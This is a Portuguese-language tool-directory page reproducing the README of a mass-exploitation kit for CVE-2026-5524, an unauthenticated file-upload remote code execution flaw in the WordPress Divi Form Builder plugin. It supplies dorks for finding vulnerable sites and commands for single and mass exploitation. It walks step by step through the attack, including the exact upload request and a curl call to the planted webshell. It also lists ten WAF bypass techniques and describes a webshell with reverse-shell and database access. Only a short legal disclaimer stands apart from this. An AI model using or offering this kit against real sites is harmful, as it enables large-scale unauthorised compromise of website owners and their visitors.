Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5524-PoC — Kit de exploração em massa para CVE-2026-5524, um RCE de upload de arquivo não autenticado no Divi Form Builder. Possui varredura multithread, técnicas de bypass de WAF, implantação de webshell personalizado e execução interativa de comandos. | Kitploit
Ferramentas/GitHubGitHub/caterscam/cve-2026-5524-poc
ReconhecimentoScanners de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebColeta de InformaçõesBypass de WAFTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Red Teaming
Desenvolvimento de Payloads
GitHubcaterscam/cve-2026-5524-poc

CVE-2026-5524-PoC

Kit de exploração em massa para CVE-2026-5524, um RCE de upload de arquivo não autenticado no Divi Form Builder. Possui varredura multithread, técnicas de bypass de WAF, implantação de webshell personalizado e execução interativa de comandos.

Ver Repositório
114há 2 mesesAinda não revisado
Compartilhar

CVE-2026-5524 — RCE não autenticado no Divi Form Builder

Kit de exploração em massa para CVE-2026-5524, uma vulnerabilidade de upload arbitrário de arquivos não autenticado no plugin WordPress Divi Form Builder <= 5.1.8 que leva à execução remota de código.

version Devon Aji python telegram

CampoValor
CVE2026-5524
CVSS9.8 (Crítico)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AfetadoDivi Form Builder <= 5.1.8
Corrigido5.1.9
TipoUpload de Arquivo Não Autenticado para RCE
Pesquisador0xd4rk5id3 - EnvoraSec

Conteúdo

  • Descrição
  • Dorks
  • Instalação
  • Uso
    • Alvo único
    • Exploração em massa
    • Bypass avançado
    • Execução de comando
  • Detalhes da vulnerabilidade
  • Técnicas de bypass
  • Pilha tecnológica
  • Estrutura do projeto
  • Fluxo de ataque
  • Aviso legal

Descrição

O plugin Divi Form Builder para WordPress contém uma vulnerabilidade de upload arbitrário de arquivos não autenticado. O manipulador do_image_upload() passa o parâmetro POST acceptFileTypes controlado pelo usuário diretamente para uma expressão regular usada para validar extensões de arquivo. Ao fornecer um valor como phtml, um atacante pode contornar a regra .htaccess do plugin que bloqueia apenas a extensão .php e fazer upload de um webshell com uma extensão executável por PHP (.phtml, .phar, .php5, .php7 e similares).

Uma vez que o arquivo é armazenado em /wp-content/uploads/de_fb_uploads/, o Apache o executa como PHP, concedendo ao atacante execução remota de código como o usuário do servidor web.

O problema foi corrigido no Divi Form Builder 5.1.9.


Dorks

FOFA

root@kitploit:~
body="de_fb_obj" && body="fb_nonce"

Shodan

root@kitploit:~
http.html:"de_fb_obj" http.html:"fb_nonce"

Google

root@kitploit:~
inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

root@kitploit:~
app:"WordPress" && body:"de_fb_obj"

Censys

root@kitploit:~
services.http.response.body: "de_fb_obj"

Instalação

Requisitos: Python 3.8 ou mais recente no Linux, macOS ou WSL.

root@kitploit:~
git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

Uso

Alvo único

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com

Exploração em massa

root@kitploit:~
python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

Bypass avançado

Para alvos atrás de um WAF (NinjaFirewall, Wordfence, ModSecurity) ou com configuração Apache ou nginx endurecida.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

Execução de comando

Após um upload bem-sucedido, o script pode executar imediatamente um comando ou abrir um shell interativo.

root@kitploit:~
python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

Flags

FlagDescrição
-u URLURL do alvo único
-l FILEArquivo contendo lista de alvos, uma URL por linha
-t NNúmero de threads simultâneas (padrão 10)
--timeout NTempo limite da requisição em segundos (padrão 15)
-o FILESalvar resultados em arquivo JSONL
--proxy URLRotear tráfego através de proxy HTTP
--nonce HASHUsar um nonce fornecido manualmente, pulando a detecção automática
--ext EXTForçar uma única extensão em vez da lista completa de bypass
--shellEntrar em shell RCE interativo ao obter sucesso (apenas alvo único)
--cmd CMDExecutar um comando no alvo e depois sair
--shell-file FILEFazer upload de um payload de shell personalizado em vez do embutido
--no-verifyPular a etapa de verificação de RCE pós-upload
--strict-verifyConfirmar que a URL do shell retorna HTTP 200 para filtrar falsos positivos
--user-iniFazer upload de um dropper .user.ini para ambientes PHP-FPM
--htaccessFazer upload de um reativador .htaccess para ambientes Apache
--aggressiveAtivar todas as técnicas de bypass disponíveis
--null-byteIncluir tentativas de byte nulo e extensão dupla
--path-traversalTentar fazer upload para subdiretórios /uploads/YYYY/MM/
--debugImprimir respostas HTTP brutas para diagnóstico

Detalhes da vulnerabilidade

Código vulnerável

O manipulador vulnerável constrói uma regex a partir da entrada do usuário sem sanitização.

root@kitploit:~
public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

Ao enviar acceptFileTypes=phtml, a regex resultante /\.(phtml)$/i corresponde a nomes de arquivo terminados em .phtml, mesmo que o arquivo .htaccess do próprio plugin bloqueie apenas a extensão .php. O Apache então executa o arquivo enviado como PHP, resultando em execução remota de código.

Cadeia de ataque confirmada

  1. Rastreie uma página que incorpora um formulário Divi Form Builder (/, /contact, /quote, etc). Acrescente um parâmetro ?nocache=<random> para derrotar Varnish, WP Rocket e outros caches de página que serviriam um nonce desatualizado.

  2. Extraia o valor fb_nonce do objeto JavaScript localizado:

    root@kitploit:~
    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. Envie um POST multipart para /wp-admin/admin-ajax.php com:

    root@kitploit:~
    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. Leia a URL do arquivo da resposta JSON:

    root@kitploit:~
    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. Solicite o shell com um comando codificado em base64:

    root@kitploit:~
    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

Técnicas de bypass

#TécnicaAlvos
1Extensões PHP alternativas .phtml, .phar, .php5, .php7, .php4, .pht, .shtmlRegra .htaccess do plugin que bloqueia apenas .php
2Variação de maiúsculas/minúsculas .PHTML, .PHP5, .PhTmLAssinaturas WAF que diferenciam maiúsculas/minúsculas (NinjaFirewall)
3Extensão dupla .phtml.jpg, .php.jpgPeculiaridades de negociação de conteúdo mod_mime do Apache
4Byte nulo .php%00.jpg, .phtml%00.txtVersões antigas do PHP (menos que 5.3.4) e certos parsers
5Espaço ou ponto final .php , .php.Windows IIS e versões antigas do Apache
6Spoofing de Content-Type application/octet-streamWAFs que se baseiam no cabeçalho Content-Type multipart
7Fazer upload de um .htaccess real que reativa PHP para .gif, .png, .jpg, .txt, .html, etc.Servidores Apache com AllowOverride All
8Fazer upload de um .user.ini com auto_prepend_fileAmbientes PHP-FPM
9Injeção de nome de arquivo através de manipulação de boundary multipartProxies e WAFs que reanalisam o corpo da requisição
10Path traversal ../shell.phtml no nome do arquivoRestrições de diretório do plugin

O script tenta cada técnica em ordem de prioridade e, quando --aggressive está definido, tenta todas mesmo após o primeiro upload relatar sucesso.


Pilha tecnológica

Script de exploração

ComponenteTecnologia
LinguagemPython 3.8+
Cliente HTTPrequests
Manipulação TLSurllib3 em modo inseguro para certificados autoassinados
Concorrênciaconcurrent.futures.ThreadPoolExecutor para varredura em massa
Parsingre para extração de nonce, json para tratamento de resposta
Codificaçãobase64 para parâmetro de comando do webshell
CLIargparse com 19 flags configuráveis

Shell personalizado (bypass.phtml)

ComponenteTecnologia
LinguagemPHP 7.0+
Funções de execuçãosystem(), shell_exec(), proc_open(), passthru(), popen()
InterfaceFormulário HTML simples, sem framework JavaScript
FuncionalidadesNavegador de arquivos, execução de comando, acesso a banco de dados, reverse shell, autoinstalação de .htaccess e .user.ini
TamanhoAproximadamente 16 KB
Camadas de bypassSeis caminhos de execução independentes mais payloads codificados

Estrutura do projeto

root@kitploit:~
cve-2026-5524/
|-- CVE-2026-5524.py          Script principal de exploração
|-- bypass.phtml              Webshell PHP multicamada de 16 KB
|-- htaccess_enable.phtml     Dropper que escreve um .htaccess reativador
|-- user_ini.phtml            Dropper que escreve um .user.ini para PHP-FPM
|-- targets.txt               Exemplo de lista de alvos
|-- pwned.jsonl               Gerado pela flag -o durante varreduras em massa
|-- requirements.txt          Dependências Python
`-- README.md                 Este documento

Fluxo de ataque

root@kitploit:~
+--------------------------------------------------+
| 1. Reconhecimento                                |
|    GET /?nocache=<random>                        |
|    Analisar fb_nonce de de_fb_obj                |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 2. Criar exploit                                 |
|    POST /wp-admin/admin-ajax.php                 |
|    action=de_fb_image_upload                     |
|    acceptFileTypes=phtml                         |
|    [email protected]                             |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 3. Servidor aceita e armazena arquivo            |
|    /uploads/de_fb_uploads/<random>.phtml         |
+-------------------------+------------------------+
                          |
                          v
+--------------------------------------------------+
| 4. Executar                                      |
|    GET shell.phtml?x=base64(comando)             |
|    Execução remota de código alcançada           |
+--------------------------------------------------+

Aviso legal

Esta ferramenta é fornecida para fins educacionais e para uso durante testes de penetração autorizados. Exemplos de uso aceitável incluem:

  • Programas de bug bounty que autorizam explicitamente o teste do alvo
  • Competições Capture the Flag e ambientes de laboratório dedicados
  • Avaliações internas de segurança com permissão por escrito do proprietário do ativo
  • Pesquisa acadêmica de segurança conduzida em ambiente controlado

O uso não autorizado contra sistemas que você não possui ou para os quais não possui permissão explícita por escrito para testar é ilegal em praticamente todas as jurisdições e é estritamente proibido. O autor não endossa nem assume responsabilidade pelo uso indevido deste código.

J'ai la permission et je suis autorisé à effectuer ce pentest. (Tenho permissão e estou autorizado a realizar este pentest.)

Leis de provável relevância incluem a UU ITE da Indonésia, o Computer Fraud and Abuse Act dos Estados Unidos, a Convenção sobre Cibercrime da União Europeia e legislação equivalente em outros lugares. Em caso de dúvida, obtenha autorização por escrito primeiro.


Licença

Apenas para uso educacional. Consulte a seção de aviso legal para os termos completos de uso.

Baixar ferramenta